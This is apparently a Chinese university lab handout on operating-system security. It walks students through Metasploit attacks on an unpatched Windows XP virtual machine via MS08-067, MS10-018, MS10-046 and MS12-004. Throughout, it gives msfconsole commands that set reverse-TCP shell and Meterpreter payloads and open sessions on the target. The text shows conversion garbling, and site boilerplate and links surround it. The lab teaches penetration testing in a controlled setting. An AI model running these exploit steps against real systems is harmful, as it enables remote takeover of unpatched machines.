版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進行舉報或認領(lǐng)
文檔簡介
1、-. z.計算機系統(tǒng)平安 實驗二:操作系統(tǒng)平安與metasploit滲透測試實驗目的:學習計算機操作系統(tǒng)平安相關(guān)容。學習操作系統(tǒng)滲透相關(guān)容學習metasploit滲透工具使用。實驗原理:Windows 操作系統(tǒng)平安構(gòu)造網(wǎng)絡滲透原理實驗環(huán)境:軟件: vmware 8.0環(huán)境下,虛擬機, vm-Win*P鏡像虛擬機,backtrack 4及backtrack 5 虛擬機鏡像 等。實驗拓撲:被滲透機: 使用虛擬機*P,建議使用未安裝更新的英文*P操作系統(tǒng), 設(shè)置其IP地址為,自動獲得,虛擬機網(wǎng)絡連接方式 NAT方式。實驗室計算機network系統(tǒng)下中network_vm 目錄中有metasploit
2、able_*P,可使用之。滲透測試機: 使用Bt4或5作為操作系統(tǒng),準備工作:啟動兩臺虛擬機,按上圖方式設(shè)置,請先記錄下兩臺虛擬機的IP:被滲透機:操作系統(tǒng):_windows *p with sp1_IP地址: 滲透測試機:操作系統(tǒng):_bt5_IP地址:(注意,假設(shè)網(wǎng)絡連接未啟用,請先啟用之,linu* 下可使用ifup eth0)實驗容:第一局部:針對操作系統(tǒng)部效勞端口進展?jié)B透了解ms08-067漏洞詳情:請課后上網(wǎng)查詢相關(guān)容漏洞描述:曾經(jīng)的沖擊波、震蕩波等大規(guī)模攻擊都是由于Windows的RPC效勞漏洞造成的,MS08-067遠程溢出漏洞也不例外。MS08-067遠程溢出漏洞的原因是由于W
3、indows系統(tǒng)中RPC存在缺陷造成的,Windows系統(tǒng)的Server效勞在處理特制RPC請求時存在緩沖區(qū)溢出漏洞,遠程攻擊者可以通過發(fā)送惡意的RPC請求觸發(fā)這個溢出,如果受影響的系統(tǒng)收到了特制偽造的RPC請求,可能允許遠程執(zhí)行代碼,導致完全入侵用戶系統(tǒng),以SYSTEM權(quán)限執(zhí)行任意指令并獲取數(shù)據(jù),并獲取對該系統(tǒng)的控制權(quán),造成系統(tǒng)失竊及系統(tǒng)崩潰等嚴重問題。漏洞對象:受MS08-067遠程溢出漏洞影響的系統(tǒng)非常多,受影響的操作系統(tǒng)有Windows *P /2000/Vista/2003等。除Windows Server 2008 Core外,根本上所有的Windows系統(tǒng)都會遭受此漏洞的攻擊,特
4、別是在Windows 2000、Windows *P和Windows Server 2003系統(tǒng),攻擊者可以利用此漏洞無需通過認證運行任意代碼。這個漏洞還可能被蠕蟲利用,此平安漏洞可以通過惡意構(gòu)造的網(wǎng)絡包直接發(fā)起攻擊,并且攻擊者可以獲取完整權(quán)限,因此該漏洞很可能會被用于制作蠕蟲以進展大規(guī)模的攻擊。漏洞端口:_445_步驟一:啟動metasploit 控制臺msfconsole記錄其步驟二:搜索模塊 ms08-067號模塊search ms08-067找到模塊,記錄其名稱,級別,描述步驟三:使用這個模塊use windows/smb/ms08_067_netapi步驟四:查找有用的payload
5、sshow payloads步驟五:使用其中最常用的一個payloadset payload windows/shell/reverse_tcp步驟六:查看當前的這個payload 以及攻擊所需要的參數(shù)選項show options發(fā)現(xiàn)模塊所需要選項,有些有默認參數(shù): RPORT ,SMBPIPE 有些沒有 RHOST 發(fā)現(xiàn)payload所需要參數(shù),有些有默認參數(shù): E*ITFUNC ,LPORT 有些沒有 : LHOST 滲透的目標設(shè)置值 : 0 步驟七:設(shè)置參數(shù)set RHOST *.*.*.* 被滲透主機的IP地址set LHOST *.*.*.*滲透測試主機的IP地址。步驟八:show
6、options 查看當前參數(shù)設(shè)置是否齊全。步驟九:show targets 查看當前攻擊的目標。0 假設(shè)有,則表示可進展自動選擇攻擊。其他,則為特定選擇特定系統(tǒng)。步驟十:參數(shù)齊全,目標選定,滲透載荷準備就緒,然后實施。e*ploit滲透開場。自動創(chuàng)立一shell (命令提示符使用ipconfig 及dir等命令確定當前控制的計算機是哪臺。 翻開放大鏡:步驟十一:E*it 然后再e*it退出。第二局部:針對操作系統(tǒng)下的瀏覽器進展?jié)B透步驟一:瀏覽器漏洞MS10-018了解ms10-018漏洞詳情:請課后上網(wǎng)查詢相關(guān)容漏洞描述: 在提交數(shù)據(jù)時Internet E*plorer處理使用特制編碼字符串的
7、容的方式存在信息泄露漏洞。攻擊者可以通過創(chuàng)立特制的網(wǎng)頁來利用這個漏洞,如果用戶查看了該網(wǎng)頁就會導致信息泄露。成功利用這個漏洞的攻擊者可以查看本地計算機或其他域或Internet E*plorer區(qū)中的其他瀏覽器窗口的容。漏洞對象:Microsoft_Internet_E*plorer_7.0 Microsoft_Internet_E*plorer_6.0_SP1 Microsoft_Internet_E*plorer_6.0 Microsoft _Internet _E*plorer _5.0.1_ SP4漏洞端口: 8080 步驟一:啟動metasploit 控制臺msfconsole步驟二
8、:搜索模塊 ms10-018號模塊search ms10-018找到模塊,記錄其名稱,級別,描述步驟三:使用這個模塊use windows/browser/ms10_018_ie_behaviors步驟四:查找有用的payloadsshow payloads步驟五:使用其中最常用的一個payloadset payload windows/shell/reverse_tcp步驟六:查看當前的這個payload 以及攻擊所需要的參數(shù)選項show options發(fā)現(xiàn)模塊所需要選項,有些有默認參數(shù): SRVHOST,SRVPORT,SSL,SSLVersion 有些沒有 : URIPATH 發(fā)現(xiàn)pay
9、load所需要參數(shù),有些有默認參數(shù): E*ITFUNC,LPORT 有些沒有 : LHOST 步驟七:設(shè)置SRVHOST 和LHOST 都設(shè)置為滲透測試機 IPset SRVHOST *.*.*.*set LHOST *.*.*.*target 可設(shè)置為 0滲透準備e*ploit 則列出一URL如:using url : htpp:/*.*.*.*:8080/qte30235fs暫時滲透到此(注意其中的qte30235fs為自動產(chǎn)生)在當對方機器 使用htpp:/*.*.*.*:8080/qte30235fs時,sessions產(chǎn)生使用sessions 來獲知sessionsessions -
10、i 1直接將session 轉(zhuǎn)到shell中創(chuàng)立一shell (命令提示符使用ipconfig 及dir等命令確定當前控制的計算機是哪臺翻開寫字板:第三局部:針對操作系統(tǒng)下類似快捷方式使用進展?jié)B透步驟一:瀏覽器漏洞MS10-046了解ms10-046漏洞詳情:請課后上網(wǎng)查詢相關(guān)容漏洞描述:Windows支持使用快捷方式或LNK文件。LNK文件是指向本地文件的引用,點擊LNK文件與點擊快捷方式所指定的目標具有一樣的效果。Windows沒有正確地處理LNK文件,特制的LNK文件可能導致Windows自動執(zhí)行快捷方式文件所指定的代碼。這些代碼可能位于USB驅(qū)動、本地 或遠程文件系統(tǒng)、光驅(qū)或其他位置,
11、使用資源管理器查看了LNK文件所在位置就足以觸發(fā)這個漏洞。默認下Windows啟動了自動加載和自動播放功能,因此 在連接可移動設(shè)備如USB閃存后Windows會自動翻開資源管理器。其他顯示文件圖標的應用也可用作這個漏洞的攻擊載體。漏洞對象:Microsoft Windows *P SP3Microsoft Windows *P SP2Microsoft WindowsVistaSP2Microsoft WindowsVistaSP1Microsoft Windows Server 2008Microsoft Windows Server 2008 SP2Microsoft Windows Se
12、rver 2008 R2Microsoft Windows Server 2003 SP2Microsoft Windows 7漏洞端口:_80_步驟一:啟動metasploit 控制臺msfconsole步驟二:搜索模塊 ms10-046號模塊search ms10-046找到模塊,記錄其名稱,級別,描述步驟三:使用這個模塊use windows/browser/ms10_046_shortcut_icon_dllloader步驟四:查找有用的payloadsshow payloads步驟五:使用其中最常用的一個payloadset payload windows/shell/reverse
13、_tcp步驟六:查看當前的這個payload 以及攻擊所需要的參數(shù)選項show options發(fā)現(xiàn)模塊所需要選項,有些有默認參數(shù): SRVPORT ,SRVHOST ,URIPATH 有些沒有 UNCHOST 發(fā)現(xiàn)payload所需要參數(shù),有些有默認參數(shù): E*ITFUNC ,LPORT 有些沒有 : LHOST 步驟七:設(shè)置SRVHOST 和LHOST 都設(shè)置為滲透測試機 IPset SRVHOST *.*.*.*set LHOST *.*.*.*設(shè)置瀏覽的URLset URIPATH hzs.html (其中hzs 為你的的首字母)target 可設(shè)置為 0滲透準備e*ploit 報錯,說
14、明URIPATH不能改動,需要改回默認值重新e*ploit則列出一URL如:using url : htpp:/*.*.*.*:8080/hzs.html暫時滲透到此在當對方機器 使用如:using url : htpp:/*.*.*.*:8080/hzs.html時,sessions產(chǎn)生使用sessions 來獲知sessionsessions -i 1直接將session 轉(zhuǎn)到shell中創(chuàng)立一shell (命令提示符使用ipconfig 及dir等命令確定當前控制的計算機是哪臺翻開任務管理器:使用taskmgr命令*第四局部:滲透時使用meterpreter工具。瀏覽器漏洞MS12-00
15、4Windows Media Player是系統(tǒng)的多媒體播放組件。WMP在處理畸形構(gòu)造的MIDI數(shù)據(jù)時存在存破壞漏洞,遠程攻擊者可能利用此漏洞通過誘使用戶訪問惡意網(wǎng)頁控制用戶系統(tǒng)。受影響系統(tǒng):Microsoft Windows *P ProfessionalMicrosoft Windows *P Home EditionMicrosoft Windows VistaMicrosoft Windows Storage Server 2003Microsoft Windows Server 2008Microsoft Windows Server 2003 Web EditionMicrosof
16、t Windows Server 2003 Standard EditionMicrosoft Windows Server 2003 Enterprise EditionMicrosoft Windows Server 2003 Datacenter EditionMicrosoft Windows 7啟動msfconsolesearch ms12_004搜索不到該模塊得到相關(guān)結(jié)果為windows/browser/ms12_004_midi使用它use windows/browser/ms12_004_midi查看 payloadsshow payloadsset payload windo
17、ws/meterpreter/reverse_tcp查看相關(guān)的選項optionsshow options有SRVHOST SRVPORT SSL及SSL version為模塊的參數(shù)有E*ITFUNC和LHOST 及LPORT作為payload的參數(shù)。還有target 設(shè)置設(shè)置SRVHOST 和LHOST 都設(shè)置為本地IPset SRVHOST *.*.*.*set LHOST *.*.*.*target 可設(shè)置為 0set URLPATH certsrv.html滲透準備e*ploit 則列出一URL如:using *.*.*.*:8080/certsrv.html暫時滲透到此在當對方機器 使用*.*.*.*:8080
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負責。
- 6. 下載文件中如有侵權(quán)或不適當內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 2025年度影視后期制作與剪輯服務合同范本4篇
- 2025年度專業(yè)樹木種植與生態(tài)旅游開發(fā)合同4篇
- 2025年度夏令營教育成果評估與分析合同4篇
- 把羊包給他人的合同
- 2025年度林業(yè)資源開發(fā)與合作經(jīng)營合同模板3篇
- 2025年度牛只運輸與飼料配送綜合性服務合同4篇
- 2025年度內(nèi)墻涂料工程舊房翻新改造施工合同2篇
- 二零二五年度煤礦資源整合項目合同書4篇
- 2025版民宿布草租賃與民宿客棧特色文化打造合同4篇
- 2025年度股權(quán)轉(zhuǎn)讓與客戶關(guān)系維護合同范本3篇
- 9.1增強安全意識 教學設(shè)計 2024-2025學年統(tǒng)編版道德與法治七年級上冊
- 《化工設(shè)備機械基礎(chǔ)(第8版)》全套教學課件
- 人教版八年級數(shù)學下冊舉一反三專題17.6勾股定理章末八大題型總結(jié)(培優(yōu)篇)(學生版+解析)
- 2024屆上海高考語文課內(nèi)古詩文背誦默寫篇目(精校版)
- DL-T5024-2020電力工程地基處理技術(shù)規(guī)程
- 2024年度-美團新騎手入門培訓
- 初中數(shù)學要背誦記憶知識點(概念+公式)
- 駕照體檢表完整版本
- 農(nóng)產(chǎn)品農(nóng)藥殘留檢測及風險評估
- 農(nóng)村高中思想政治課時政教育研究的中期報告
- 20100927-宣化上人《愣嚴咒句偈疏解》(簡體全)
評論
0/150
提交評論